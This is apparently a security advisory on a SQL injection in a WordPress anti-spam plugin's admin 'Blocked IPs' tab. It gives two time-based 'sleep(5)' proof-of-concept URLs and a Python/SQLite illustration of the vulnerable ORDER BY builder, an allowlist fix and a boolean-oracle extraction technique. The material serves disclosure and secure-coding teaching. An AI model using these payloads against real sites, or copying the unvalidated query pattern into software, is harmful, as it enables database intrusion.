The plugin does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard (the ORDER BY clause of the query that lists the "Blocked IPs" tab), leading to a SQL injection. Because ORDER BY takes column names and sort directions rather than data values, escaping alone does not help here; both parameters have to be checked against an allowlist of permitted columns and directions.
With at least one IP in the "Blocked IPs" list, each of the following requests makes the response take about five seconds longer (the first injects through orderby, the second through order):

https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=1 and sleep(5)
https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=date_added&order=+and+sleep(5)
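The bug class and its fix, as an added example that is not the plugin's code: the plugin is PHP, but the same pattern is modelled here in Python against an in-memory SQLite table so it runs offline. The table and column names (blocked_ips, ip, date_added) and the sample rows are assumptions made for the illustration. vulnerable_query() pastes the two request parameters into ORDER BY exactly as the advisory describes; hardened_query() replaces anything not on an allowlist with a default, which is the same idea as WordPress's own sanitize_sql_orderby() helper. SQLite has no sleep(), so the time-based payloads from the PoC surface as a "no such function" error instead of a delay, which still proves the text reached the SQL parser; the last function shows that the same injection point also works as a boolean oracle, because the order of the returned rows changes with an attacker-chosen condition.

```python
import sqlite3

# Constructed sample data standing in for the plugin's "Blocked IPs" list.
# Table and column names are assumptions for this illustration, not the plugin's schema.
SAMPLE_ROWS = [
    ("203.0.113.5", "2021-05-01 10:00:00"),
    ("198.51.100.9", "2021-04-20 08:30:00"),
    ("192.0.2.77", "2021-06-11 12:45:00"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE blocked_ips (id INTEGER PRIMARY KEY, ip TEXT, date_added TEXT)"
    )
    conn.executemany("INSERT INTO blocked_ips (ip, date_added) VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_query(orderby, order):
    # The bug from the advisory: request parameters concatenated straight into ORDER BY.
    return f"SELECT ip FROM blocked_ips ORDER BY {orderby} {order}"


ALLOWED_ORDERBY = {"id", "ip", "date_added"}
ALLOWED_ORDER = {"ASC", "DESC"}


def hardened_query(orderby, order, default_orderby="date_added", default_order="DESC"):
    # ORDER BY takes identifiers and keywords, which cannot be bound as prepared-statement
    # parameters, so the fix is an allowlist rather than escaping: anything not on the
    # list is replaced by a safe default.
    if orderby not in ALLOWED_ORDERBY:
        orderby = default_orderby
    order = str(order).upper()
    if order not in ALLOWED_ORDER:
        order = default_order
    return f"SELECT ip FROM blocked_ips ORDER BY {orderby} {order}"


def run(conn, sql):
    return [row[0] for row in conn.execute(sql)]


def sleep_payload_parsed(conn, orderby, order):
    # True when the injected sleep() call is parsed as SQL. SQLite has no sleep(), so the
    # PoC payload fails with "no such function: sleep"; on MySQL the same query would
    # simply pause for five seconds, which is what the advisory's PoC relies on.
    try:
        run(conn, vulnerable_query(orderby, order))
        return False
    except sqlite3.OperationalError as exc:
        return "sleep" in str(exc)


def order_for_condition(conn, condition_sql):
    # Same injection point used as a boolean oracle: the rows come back sorted by
    # date_added when the attacker's condition is true and by ip when it is false,
    # so the response order leaks one bit per request without any time delay.
    expr = f"(CASE WHEN {condition_sql} THEN date_added ELSE ip END)"
    return run(conn, vulnerable_query(expr, "ASC"))


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query("1 and sleep(5)", ""))
    print(hardened_query("1 and sleep(5)", ""))
    print(hardened_query("date_added", " and sleep(5)"))
    print(sleep_payload_parsed(db, "date_added", " and sleep(5)"))
    print(order_for_condition(db, "1=1"), order_for_condition(db, "1=0"))
```

The hardened builder falls back to a default rather than raising, which matches how WordPress list tables usually behave; raising (or returning an error to the admin page) is equally valid as long as the raw parameter never reaches the query string.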